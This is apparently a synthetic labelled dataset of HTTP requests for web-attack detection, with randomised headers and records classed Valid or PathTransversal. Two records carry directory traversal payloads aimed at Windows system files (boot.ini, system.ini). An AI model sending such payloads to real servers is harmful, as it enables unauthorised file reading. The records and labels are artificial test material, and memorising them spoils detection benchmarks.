Accept: text/*, application/*, video/*
Accept-Charset: x-mac-japanese, us-ascii;q=0.5, windows-874;q=0.9, windows-1250;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 95.90.20.151
Cookie: Ta=43ioW9tyaqttdm;esgsod3skissdos=openda
Cookie2: $Version="139"
Date: Sat, 22 Jul 06 03:39:14 UTC
ETag: "1XQQfpNQ_PCXGJdpK"
Expect: iRorbi=nmhidx
From: llde@xop7tnntt.de
If-Modified-Since: Sun, 09 May 04 03:13:26 CET
If-Unmodified-Since: Tue, 08 May 07 17:20:04 UTC
If-Match: "vV4jJ-lZeSx3qoVr0.A@"
If-None-Match: "CY7J5D1mgLwHweip_VY"
If-Range: *
Max-Forwards: 0470
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM YWViczBoc2F5cFVvaWxidGl1ZWVpYW9yYW5la2lpZW9ra2FscGk=
Authorization: ihoeTo M9ttet=ta1fng
Range: 4-343448,-16531
Referer: http://www.Hotnft.de/ucJkgT/iupOhnjI/esavib3n/thtsm/EcoEo.php3
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: eO7kqqKP4w http://www.ht2dvsal.com
UA-CPU: x86
UA-Disp: 3478,401,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3585x2586
Via: HTTP/3.7 www.dcLtSnte.js, ssh/6.3 www.m4ro.gif
Transfer-Encoding: compress
Upgrade: Hsoeo/0.1, t4K/8.3, iwhfu/8.2
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 44.159.255.205
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11621
Start - Id: 2785
class: Valid
GET /ae/9J_gIV1e28Ck7lJn/laS8cjdeivlWdUAaw/3P3fO4I9-zX/uils11Tqskxdehj.css?RapDgroup byS=nmA5VWZeJYl&nErbstreaambor=Asaaeca&tt=llHtemh&ntiaosrrhAr=l%7Cr%3CrhtbtmuE&9igefeibaigYno=aj%5Die&wtbMhiqnwlae=euvT&it=2802&l4t=%7E7&nrlsehenivl=0 HTTP/1.1
Host: www.dh85unpf.com
Connection: close
Accept: */*;q=0.6
Accept-Charset: utf-7;q=0.8, us-ascii;q=0.8, windows-1255;q=0.9, x-mac-korean
Accept-Encoding: 
Accept-Language: s-Ktwunhag;q=0.1, sTttt-taaHrdes;q=0.1, tv-neiegag, rd-9, oi-tlans
Cache-Control: ihs='iiewds'
Client-ip: 202.208.156.40
Cookie: gr=EEmuh;tdiy1=3770985;eDp5bcdr=tek3Ofbttwsalprocessing-instruction;6etuve2a=ua0st;hNmhteepdhmnn=ieA;goOfc3uwfua=o3
Cookie2: $Version="78"
Date: Sun, 09 Dec 07 18:24:00 UTC
ETag: "Ddx8ftvn5TLLcJFhel"
Expect: Euusi=esnretl
From: 7nttm@aa4uGahn.st
If-Modified-Since: Tue, 25 Oct 05 08:27:40 CET
If-Unmodified-Since: Tue, 19 Sep 06 03:28:48 UTC
If-Match: "kuIFtkmqhwMjxwg2"
If-None-Match: *
If-Range: Thu, 12 Nov 09 11:13:22 GMT
Max-Forwards: 88
MIME-Version: 5.1
Pragma: O=p6tozbNa
Proxy-Authorization: Digest realm
Authorization: NTLM dGNQWGpvYWl5ZUhyZWdscHR3ZGJscnMybGlucmhkbGVvYnBocXJvYWlhYnM=
Range: 771-26
Referer: http://www.ieatl2.gov/lneln/uli6gh/toae/IsnEe/9xdmusnh.tiff
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: y.56oAn http://www.limnei.net
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 944x3965
Via: HTTP/2.4 161.223.126.13, HTTP/7.5 www.Nruotstm.shtml
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2785
Start - Id: 45378
class: PathTransversal
POST /rEutl7weE.dll? HTTP/1.1
Content-Length: 310
Content-Language: e40rdia,hdrLyiOr,st54a2
Content-Encoding: gzip
Content-Location: /dzfjt6e/wtbcEetn/tnelBt/rttl1b/eZhHe.gif
Content-MD5: YTFpdHRhYXRmTHlnYW1pcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Apr 08 18:22:50 CET
Last-Modified: Mon, 08 May 06 13:26:31 GMT
Host: 192.166.103.62
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.3
Accept-Language: *
Cache-Control: hieitn='ygbiwil'
Client-ip: 219.120.83.225
Cookie: xSJbBs8BhTW=99;tl=26746;r7=:len
Cookie2: $Version="96"
Date: Wed, 16 Jun 04 21:51:03 CET
ETag: "BVmpJ8txQ8q.HBmdrzQB"
Expect: 100-continue
From: R3loelSr@cnorhewh.st
If-Modified-Since: Thu, 10 Jun 04 14:12:45 UTC
If-Unmodified-Since: Thu, 19 Jun 08 02:02:44 CET
If-Match: ".8OJH7-Crdvuffy_wPn"
If-None-Match: *
If-Range: Fri, 23 Oct 09 10:17:28 UTC
Max-Forwards: 81
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: NTLM YWNoYXNzZTVPcjZlem9uZXR0c3dubndvdGFvcm9uTk5vZGVFZTNl
Range: 0524-
Referer: /2nl9.mpg
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: ssps9qPbK http://www.g3a1yco.be
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-Color: color8
UA-Pixels: 789x027
Via: 2.3 www.vt43f.tiff
Transfer-Encoding: identity
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

_knJW=91309919&hdEqoloeoraetr=w3q6ACjMJ1Tr&Lu1=919&9aavrwt=osnatg&cnIgeEhj=870550&oriemteixhnr5s=s:\winnt\boot.ini&vbscriptnxoy5pXpXp=ztrtoteue9tst6&GnZNTH1Q@M=eehkxeasoshoo&2enspElpne=tse:q?ebetweenuhguacg&e28r4eho=bBS42OaRK&aH2Dnlhgtte2rp=b&eeekrtn3a=rz28L&mgTd=agpenestshw2&ecfooou=dN0nm&iaN=20240

End - Id: 45378
Start - Id: 17328
class: Valid
GET /niumpccvm/rWP_tUY5wEhA/ogqsToouoI3/cchCZQ/dj3t7A/n8dEGnt/RfrrvoofeenaMgoeo5/j4hscii6soTdtuD8N/lmqDLIzKlsH-afcYl4/rALSZ9pM3hxeQzioL5G_/rmseseTlHl.png?hrasPfhsiAoO=0855855346&t0Ct1ioo3oo=16&relieetc0odasb=aetlaj9pr&x4u3MZcservices4ANQ=987941445&oehbha9atrl9ffa=9336537 HTTP/1.0
Host: 224.118.249.127
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4939
Client-ip: 251.211.186.188
Cookie: g7Eer0rdaedS=thogHuOls;atu8=s72;rbDsn=8gexNyxs5r;9@Nl=eR2tc/xa<
Cookie2: $Version="840"
Date: Wed, 27 Aug 08 01:49:39 CET
ETag: W/"yMDXvl2uoFuOP3i"
Expect: 100-continue
From: 1rsdas@zamn2no.de
If-Modified-Since: Thu, 17 Dec 09 13:31:25 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:42:10 UTC
If-Match: "a.Y7YtiK0DFRbVqF"
If-None-Match: "JhVZ@tv.XdXvrzLTy"
If-Range: "6zxEAMwvFoZaGmly2G"
Max-Forwards: 717
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/dEasnr/nifefdsN/jtmItno/tqlthnia/esaa.dll
Authorization: NTLM Mm9hbnRndnN0N2V0NjdiZmZlYWRkaG5rYWl5YXRzYmlzSDFzOWVkbGFxaA==
Range: 570800-
Referer: http://www.eotiz.it/eiiaao.wmn
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.8 (Windows; U; Win98 7.5; sm-sc; rv:6.1.8) Gecko/18374048
UA-CPU: 68000
UA-Disp: 8556,725,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 455x7663
Via: 1.6 www.aE2no.jpg
Transfer-Encoding: gzip
Upgrade: siw/5.1, pnee/6.8, tnnE/9.7, osHvsm/3.4
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 75371955994853740
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17328
Start - Id: 31902
class: Valid
GET /0lenrh0i0t/eyoD_cAqcIEnx/ttAtnefiao5ma/teML1yitHiqxs0Rw0adm/eNHSa8TVYjF/hdBhied5dtareha2zr2s/tVPUG_.C-k@XlX/hkieIktcl/zlleotah/sHLLvJ8YUqVk/r9HxHrrCvAHoR0j/to1lasr0pwynjndtcU.aspx?ahnaodksSead=nlX+%245IaUtawp-&e1bumresieerq=24&hahdze=t0ncothomi%40rTnzohomera&ihw3osbe9aau=6567327&viaCaah2tzo=6396&VKjXaqWQ=tupseniadu HTTP/1.1
Host: www.sp8iti.fr:330
Connection: keep-alive
Accept: image/*, application/rtf
Accept-Charset: iso-8859-7, utf-8
Accept-Encoding: 
Accept-Language: o-Tr1no
Cache-Control: yO6tnukn='nmoina'
Client-ip: 48.40.19.225
Cookie: scxncimboauy=fFM_fc1ACb;d5y=ay;dcln=o);Qxsu3n7n=427657169;8ya5soxthe8s=atsajrupdatereein7uira?i
Cookie2: $Version="035"
Date: Wed, 02 Apr 08 03:51:54 GMT
ETag: W/"SG5jVQyCNQRd8S."
Expect: rcewehTn
From: haeoa@filcnbidra.net
If-Modified-Since: Thu, 22 Mar 07 05:55:51 CET
If-Unmodified-Since: Sat, 24 Jul 04 16:18:16 UTC
If-Match: "gmH3iHHBA45MmUxKihH8"
If-None-Match: *
If-Range: Wed, 29 Mar 06 08:15:37 CET
Max-Forwards: 1625
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Eaeos
Authorization: dxdnH uEhpot=tBriy
Range: 581-,06-0,27-
Referer: /ecdlh/wrcotxer/peTdhiEn.gz
TE: deflate,chunked;q=0.3,chunked
Trailer: Expect
User-Agent: eOtoR2 http://www.itnsdbt.uk
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 049x223
Via: FTP/2.6 www.neh6soew.gif
Transfer-Encoding: identity
Upgrade: oas/9.5, aueoSs/1.5, stovTn/6.0, e0ra/0.3
Warning: 730 www.0tacu.shtml:2 "asbsh" "Fri, 27 Jan 06 13:54:38 CET"
X-Forwarded-For: 163.91.80.203
X-Serial-Number: 812398
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31902
Start - Id: 13384
class: Valid
GET /29ajsqeAr/ctBksJuoOdta/h4s/ac/reFeljMPX_PTh1_Njk7/eoecinno/t8rfi8rddrmtooc/aQwcGeIZhflsu8.AU4/h6oilCee/e8paagsonEhetmwelei/rmsfhr5sraIrHca/8wp-6vKwTz.aspx?Aua0ocstbatL=m+1a+a-r+9whomewezt7htU&wkhr3inb=15&ros=mEkXvT&oSa=lOy+%3A+eht%3Deti HTTP/1.0
Host: 68.180.158.208:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=37
Client-ip: 88.65.120.166
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Sat, 30 Jul 05 20:59:39 UTC
ETag: W/"YHWB-pSd1IKDDMSDMhX"
Expect: nsnth
From: tR8tllhl@cnlly.de
If-Modified-Since: Mon, 14 Apr 08 17:38:20 CET
If-Unmodified-Since: Sat, 22 Dec 07 12:46:39 GMT
If-Match: *
If-None-Match: "ycqV6hXmDm38qj1"
If-Range: *
Max-Forwards: 035
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic ZWVzbnZsZG46bmlsZA==
Range: 30-,-79267,97-361160
Referer: /aleneah.pl
TE: chunked,gzip;q=0.2
Trailer: Referer
User-Agent: Mozilla/8.6 (X11; U; Linux i386 5.4; 1u-hs; rv:4.5.4) Gecko/57513356
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 968x9217
Via: 1.5 www.Egttl8r0.css
Transfer-Encoding: la89
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 655 www.stNgKE7.png "aoa5fSu" 
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 0029155789665263
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13384
Start - Id: 7476
class: Valid
PUT /7eeeiq/aitsls0teecene/19/mhkbuertsltre/PFtmpZ.tiff? HTTP/1.0
Content-Length: 81
Content-Language: ihgd7
Content-Encoding: deflate
Content-Location: http://ensR.gov/EsYCr/uesacgs.dll
Content-MD5: cnNzb2tlRGV3N3pzb2FlVA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Nov 09 21:08:55 UTC
Last-Modified: Mon, 20 Aug 07 21:58:05 GMT
Host: www.seD5.com
Connection: keep-alive
Accept: audio/basic, text/xml;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=085
Client-ip: 114.82.175.14
Cookie: meLazlt98dthtd1=w4arlcat6Tgroup bycsge> o;a2tlii2Gnooa=emkebnrpitae;yaritousahee=QeiasojOnhts
Cookie2: $Version="76"
Date: Wed, 11 Feb 04 07:18:33 UTC
ETag: "XItDTO9.TSjKUBv1"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Fri, 01 Sep 06 15:55:26 GMT
If-Unmodified-Since: Thu, 07 May 09 13:07:02 UTC
If-Match: "7U4kxMW1sS2rZ9PN"
If-None-Match: "9IRlPU5.nR-f0lab37O2"
If-Range: Wed, 12 Jan 05 10:01:27 UTC
Max-Forwards: 026
MIME-Version: 4.1
Pragma: dSbli=ss
Proxy-Authorization: Basic bWFnZXRjOnVlYnVv
Authorization: rtnmmo aoonnfoe=deriaeY
Range: 0407-
Referer: http://mttr.be/Cuepixet/nhl9e3rU.cgi
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/1.8 (X11; U; Open BSD i586 2.7; on-eh; rv:7.4.5) Gecko/49065092
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 061x614
Via: lbba/0.8 www.tmua.js
Transfer-Encoding: deflate
Upgrade: yal/8.5, 5bgev9/7.7, knme0/5.7, nooi6d/0.0, Mhyhn/4.8
Warning: 177 www.a7afEsZ.js "b2loadjpr" 
X-Forwarded-For: 192.154.138.206
X-Serial-Number: 68240
----: ---------------
~~~~~: ~~~~~~~~~~~

uiespa=t&HH@uRIvR24=sUBUa4l6o&cpsuef=e]wo~lnhe&hdfX= af0opt F8d>IiS apasswd

End - Id: 7476
Start - Id: 10711
class: Valid
GET /1nueaDc0qutz/xaedtcznoeuuuhr.mspx? HTTP/1.0
Host: www.rhsidoNe.net:80
Connection: vee6bLEA
Accept: video/quicktime, audio/basic;q=0.7, video/*;q=0.2
Accept-Charset: iso-2022-kr, windows-1252, x-mac-chinesetrad;q=0.4, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=20
Client-ip: 123.186.199.25
Cookie: poneTtCteung2e=xu1ha;wiezac=\xp_hanphs svi ;DH0Zgroup byz=31
Cookie2: $Version="3"
Date: Sat, 17 Apr 10 14:10:16 UTC
ETag: "WUg9JirefD8v_q3MzuXi"
Expect: eocns=iylibw
From: apymaii@Pdts.net
If-Modified-Since: Mon, 03 May 10 09:14:20 GMT
If-Unmodified-Since: Sun, 07 Mar 04 23:25:08 GMT
If-Match: "x3QRcIVnusGiUf_CKTuk"
If-None-Match: "w@Ahps.Rk26frOq8QL9O"
If-Range: *
Max-Forwards: 902
MIME-Version: 7.4
Pragma: m5i='we7ci9'
Proxy-Authorization: Digest nonce
Authorization: ioaRE Lnhn3te=sHe04hS
Range: 569080-9470,36135-,7-
Referer: /it7r7l/orhagn/tfnH9go/CtlriCt.asmx
TE: deflate;q=0.3
Trailer: If-None-Match
User-Agent: gNrtsrf/7.2
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: 9.6 239.95.7.48:92, st5/9.1 116.23.177.22:86758
Transfer-Encoding: deflate
Upgrade: e0Tk/8.6
Warning: 733 85.32.151.90 "MQtmgt57qqbafdmyE" 
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 86511252930655335288
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10711
Start - Id: 45898
class: PathTransversal
GET /xp_./hVZS2vo334c20/access_logE/cslr9n5/efoishbslttqira/s_.NhtjBFyyh/t6N1AI4IfxR7SA17OREg/-NhP-uy6nodehavingcSKI/pm46.pl?hBvhRDq=894838&tZemEml=610585&gsOIa=tI9dwuy3YBE%40&jtqetAhialc=dsypql&h6c=srXEOHTcZ6&ASyxP@@script=rotinttlsww&Tii4nlet=tct&tdmiwltgvs=txhefetc&oesrarnE2=60nOiah6auNs&aysoLwaldia=ktal2irmtrr9fiie&X4DP0dVdocumentlibVTux=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 8.249.234.250
Connection: asehqo
Accept: image/*;q=0.8, application/x-tar
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 59.67.120.85
Cookie: atsdtsoybenb=sqoeonjsehe
Cookie2: $Version="32"
Date: Sun, 13 Jun 04 09:43:58 GMT
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: NkanyTe@uhoerre.gov
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Mon, 08 Mar 10 07:13:44 UTC
If-Match: "DChR2DoxsG6crIf5jM"
If-None-Match: *
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 24
MIME-Version: 5.1
Pragma: vfOyrte='alwkded'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest nc=3A514cE2
Range: 58-182597,4-9
Referer: http://ycsirSn.be/in2aa22/aSoiuk/atCi/to4ar/odae.mdb
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.7 (Machintosh; U; PPC Mac OS X 5.0; cn-Cg; rv:1.9.4) Gecko/90636632
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: tdf9t/4.0 214.255.180.225, 8.6 133.118.209.208
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 121.121.166.30
X-Serial-Number: 447963296121692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45898
Start - Id: 31221
class: Valid
GET /fxgLFPC/vWu0tdmpenrs1eNcIaee/s9/t@fLDCQphICiHyZq/tjQ6iKjAs3.B6/aaissofesoh7Ot/taO-17h9R0nrIxmXuW.css?oNs4oerao=ilh&dnrshS=eraSehe&_Nat7=ez&t5msrin2nyomdii=4600283&NnstiehRroie8w=me%2B1cOrt+wp-xwo&o0onNspUs8nDr8=wyns%27&wrnWeanthO=%28Bawaj6ioou&Cdehjftarho=%25kwydi%24c&VscriptDb3U=rnhhnhwzHier&xqdeaNIamscendA=397490&ini4ydR6n=uBB7&e7oetes=6853656398 HTTP/1.1
Host: www.chtr.st:80
Connection: close
Accept: video/mpeg, application/*
Accept-Charset: iso-8859-3;q=0.8
Accept-Encoding: identity, deflate;q=0.2, deflate;q=0.6, identity, compress;q=0.5
Accept-Language: aosa-hpo, A-n
Cache-Control: no-store
Client-ip: 125.51.6.162
Cookie: Psiwrnelneeey=8719722;9teyvitno=1;idtmzOeosas=8et
Cookie2: $Version="8"
Date: Tue, 10 Jul 07 16:12:18 GMT
ETag: W/"FBV@rizt5I.Cy2.tkY"
Expect: 100-continue
From: RaorT@taierr2.de
If-Modified-Since: Sun, 11 May 08 19:37:15 UTC
If-Unmodified-Since: Fri, 03 Jul 09 12:20:12 CET
If-Match: "O8CfhxEuj_Mlgpg@2"
If-None-Match: "tK9.-dv6rBN_2c7"
If-Range: Fri, 23 Jun 06 16:27:00 CET
Max-Forwards: 43
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM cjNlc2Nqc3dzMjNhZDc1eW5pbGN0d21laXpvZHNhZXRuNXg=
Authorization: NTLM QmlodHJyZXJleGF0OG55bG9qem5iZTFoSW42b3BmTHM1ZHMyeTV3eG5y
Range: 8-
Referer: /AlWwinee/supa.css
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 0.0; ev-tt; rv:3.6.2) Gecko/93843143
UA-CPU: StrongARM
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4598x453
Via: IRbm/4.3 www.eloelo.html, 1.6 www.rhit8n.png:4107, dmihia/2.1 180.15.78.199
Transfer-Encoding: identity
Upgrade: tehdl/3.7, dmy4i/4.8, yche/8.1, run/1.6
Warning: 470 www.PmqSon.tiff "etyxjzn" "Sat, 18 Jul 09 18:15:29 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 90454333
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31221
Start - Id: 30332
class: Valid
GET /nyFyEW/7DhVnetcat0H-6CTyM/k.Cxw1etc3zMu/kotwgoxlxeegaodhpgnW/ir7UOAYdXu6026nNl3Y0.mspx? HTTP/1.0
Host: www.evehr72.be
Connection: clitc
Accept: text/xml, image/gif
Accept-Charset: euc-tw;q=0.7, x-mac-korean;q=0.8, windows-1253, cp-936
Accept-Encoding: 
Accept-Language: fahaa5r-ncee;q=0.0, Z4Lr5eoO-ru
Cache-Control: no-transform
Client-ip: 1.141.100.207
Cookie: pbescbn7enad=iraoeipoo44EocWe;H_AwEt=Tprocessing-instruction ;sufcsreu3dlauou=xisFl;idrdirrnoesMhn=u
Cookie2: $Version="89"
Date: Tue, 18 Mar 08 01:28:04 GMT
ETag: W/"jDHpTDCFTQpT@SYMKl"
Expect: ehsaEtrk=7enp
From: hfr0t@7ilahls.gov
If-Modified-Since: Thu, 20 Dec 07 08:26:17 GMT
If-Unmodified-Since: Tue, 13 Oct 09 16:57:48 UTC
If-Match: "EFm11027yVhPjYj"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM ZGVoZnJBaUFvYWJlZGVmYXJkbmFzb3RpN3Z0ZGg0ZWlGeHlmYkJhUg==
Authorization: Digest uri=http://0eswln.it/0ohC1sgo/RmhiepeA/inar/ssms8l.ace
Range: 69694-798082,-8
Referer: /hehhuo/nodtk/sUo2Ap/mlcras/es7xGhs.mp3
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Accept
User-Agent: a06ET3N9qv http://www.st9oEUts.uk
UA-CPU: 68000
UA-Disp: 2673,3726,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 418x868
Via: FTP/3.1 97.103.216.198, HTTP/2.7 www.noitftt5.jpg:97, FTP/1.0 www.nfwne.js
Transfer-Encoding: compress
Upgrade: uoR/8.7, yfso78/1.9
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 116.208.83.67
X-Serial-Number: 9289993
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30332
Start - Id: 16575
class: Valid
GET /sxyririhonIvem7w/oduteyNt9eicmurd/l.45ZPT307/di.tiff?oeTZesinehqr2Al=8343904671&oaetstrq=rds&aqiienRecp=4aunemcfsazchla HTTP/1.1
Host: 137.212.220.51
Connection: close
Accept: image/gif, text/xml, text/*
Accept-Charset: x-mac-korean, utf-7;q=0.9
Accept-Encoding: *
Accept-Language: leld-iiEued, 9eiBtuue-enezhe;q=0.9, n6aasuvp-kssek
Cache-Control: only-if-cached
Client-ip: 48.4.163.255
Cookie: ihxmah0tT=oDiVSjh;httpsU_k6HAaccept=nlds99eolmcorhtpassd;eeoRakJ=a %Svfoe;suetgefgE=9km;inenr8el= giLr3eI$fyr
Cookie2: $Version="4"
Date: Sun, 22 Jun 08 17:10:43 GMT
ETag: W/"QOCXyKKfyIgomaf_0UQ"
Expect: ethraizU=wE8ninn;EsXgtoyo=ejoeol7c
From: o7mnatoB@rrengt.ch
If-Modified-Since: Wed, 07 Dec 05 05:40:52 UTC
If-Unmodified-Since: Thu, 22 Sep 05 23:13:37 GMT
If-Match: "gm9vkYdnUgjbKe6vB"
If-None-Match: "VzweKcIaEIps9wyat"
If-Range: *
Max-Forwards: 9
MIME-Version: 5.5
Pragma: a7ed=trs
Proxy-Authorization: NTLM YWllc2F0MWFzbGUzaFJuZWN1d3FmYW1SdE9lUGNkUGVlZ29vb2lnYXd0OG5lYw==
Authorization: Tsnn uhn1ea=nlliagel
Range: -098113
Referer: /ul9Se/esmeoi/etnnnohl.js
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 8.9; ss-sd; rv:5.3.3) Gecko/50004747
UA-CPU: 68000
UA-Disp: 6863,909,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9430x4545
Via: FTP/2.1 98.136.148.132, 3.1 149.100.205.177
Transfer-Encoding: identity
Upgrade: powb/8.0, rutou/7.2, nesa7g/8.1
Warning: 295 www.istr9im.png "lznh" "Sat, 11 Apr 09 07:31:57 CET"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16575
Start - Id: 15735
class: Valid
GET /vssming/rj/qi/t1rSD1fvJ1aXWD4MGHi/g7Fts/ui9bs-oGc/ctjo/eiotrisheaRizeo/a_Ep8qol0mBlc/Ts/varFLKP.bin?JfaM@9include=6c6+s&excodtl=hnft%25ubth&iar=HtmnEld6Leeen&traD=52851&QDjMXhltVu7P=8247193&oaee=n-XJ&aminyHe=296827&sq7=aShucmd2a&nMirle=7971&el8atU=7yhemrrsTnueatuud&dee=0112110&6n5sodec=45 HTTP/1.1
Host: 113.120.56.144
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-chinesetrad
Accept-Encoding: compress
Accept-Language: s1He9-gd;q=0.2, fdsf0ocu-Onbtmtm, qlt-f4e;q=0.9, hFer2n0-ShsxEz;q=0.1, Gnxope-iitda
Cache-Control: no-cache
Client-ip: 86.42.199.9
Cookie: otnbtb=o?a:;ihtzcce=4h
Cookie2: $Version="36"
Date: Sat, 08 Aug 09 22:31:07 UTC
ETag: "8ryMORi3UTFNv3v"
Expect: 100-continue
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Thu, 17 Apr 08 20:06:37 CET
If-Unmodified-Since: Tue, 04 Apr 06 03:17:47 GMT
If-Match: "39RyLyIFHaQuub9Q"
If-None-Match: *
If-Range: Fri, 26 May 06 08:35:46 UTC
Max-Forwards: 645
MIME-Version: 6.8
Pragma: t8nh0go='ta'
Proxy-Authorization: cmmrs na7a2w=hnedhrSs
Authorization: oJdm hwsurlyh=ntneerhh
Range: -6328,78162-3,153412-46
Referer: http://vlr1l.ch/Iycfri/w7ktlSzs/ooapsfi/ounny/dmas.js
TE: gzip
Trailer: Accept
User-Agent: met6d93/9.2.2.0.4
UA-CPU: StrongARM
UA-Disp: 0822,807,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 516x1974
Via: 9.2 235.19.200.234:92
Transfer-Encoding: identity
Upgrade: ioeibb/4.8
Warning: 005 135.73.33.138 "yr2lt" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 15735
Start - Id: 4130
class: Valid
PUT /oE0Ojo9usnas/cA0/EnsrAOole2Eebe5oe/aZJJZRl5/imJqL/vxt4q2.gif? HTTP/1.1
Content-Length: 257
Content-Language: ft,n,d
Content-Encoding: gzip
Content-Location: /ieNl/hnneent/qbmmE.jpeg
Content-MD5: a0lUdmlodGVkaWxmbXpsbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 07:24:21 UTC
Last-Modified: Tue, 13 Dec 05 16:57:04 CET
Host: 242.106.208.181:1443
Connection: close
